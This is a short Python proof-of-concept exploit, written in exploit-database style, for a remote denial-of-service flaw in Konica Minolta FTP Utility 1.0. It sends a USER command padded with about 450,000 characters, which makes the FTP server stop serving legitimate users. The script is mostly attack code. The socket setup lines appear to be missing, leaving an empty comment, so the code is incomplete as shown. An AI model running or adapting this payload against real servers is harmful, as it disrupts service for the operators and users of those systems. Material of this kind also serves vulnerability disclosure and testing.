# Exploit Title: Konica Minolta FTP Utility 1.0 Remote DoS PoC
# Date: 21-08-2015
# Exploit Author: Shankar Damodaran
# Vendor Homepage: http://www.konicaminolta.com/
# Software Link: http://download.konicaminolta.hk/bt/driver/mfpu/ftpu/ftpu_10.zip
# Version: 1.0
# Tested on: Microsoft Windows XP Professional SP3 English
import socket
# The ip address of the remote host
ftphost = ''
# The port of the remote host
ftpport = 21
# Fuzzed packet of a certain length, Appending this to the USER command and requesting the remote ftp server denies requests for other legitimate users.
crafted_user_name= "B" * 450012 # DoS
# Establishing connection
# Sending the evil input.
s.send('USER' + crafted_user_name +'\r\n')
# Once the packet has been sent, the DoS will occur on the remote FTP server. By sending an interrupt through (Ctrl+C), will resume the FTP server from DoS. (Note : The FTP server will not get crashed)
s.send('QUIT \r\n')
# End of PoC - Shankar Damodaran